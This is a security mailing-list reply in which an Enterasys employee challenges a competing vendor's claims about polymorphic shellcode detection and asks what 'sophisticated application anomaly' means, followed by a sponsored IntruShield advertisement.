Re: Polymorphic Shellcode detection

[sam stover <sstover () enterasys com>]

OK, vendor vs. vendor alert here.  I'm trying real hard not to act like
another vendor and more like a potential customer, but obviously that's hard
for me.

I'd like to explain how I read this e-mail:

One way to do overflow detection is to search for syscall instructions.
Snort does this and it doesn't work real well (potentially valid reasons in
original e-mail).

Another way is to check for the number of binary bytes.
ISS does this and it's obsolete for some other (potentially valid) reasons.

Some dude from academia invented a way, but it's too slow.

The only real way to do it is by "sophisticated application anomaly".
This is the best way and Intruvert does it on all their platforms.


Now, you've given fairly technical reasons why everyone else's approach is
invalid or obsolete, but you've neglected to provide the technical backup to
why your approach is the best.  Now you do say that it's been validated by
third parties, but you don't explain WHY your technology is the best.  We
are just expected to take your word for it I guess...

If I was a potential customer, I guess I'd ask:  What is "sophisticated
application anomaly"?  Could you please elucidate?


-- 

Samuel f. Stover
sstover () enterasys com



-------------------------------------------------------------------------------
INTRUSION PREVENTION: READY FOR PRIME TIME?

IntruShield now offers unprecedented Intrusion IntelligenceTM capabilities 
- including intrusion identification, relevancy, direction, impact and analysis 
- enabling a path to prevention.

Download the latest white paper "Intrusion Prevention: Myths, Challenges, and Requirements" at: 
http://www.securityfocus.com/IntruVert-focus-ids2
-------------------------------------------------------------------------------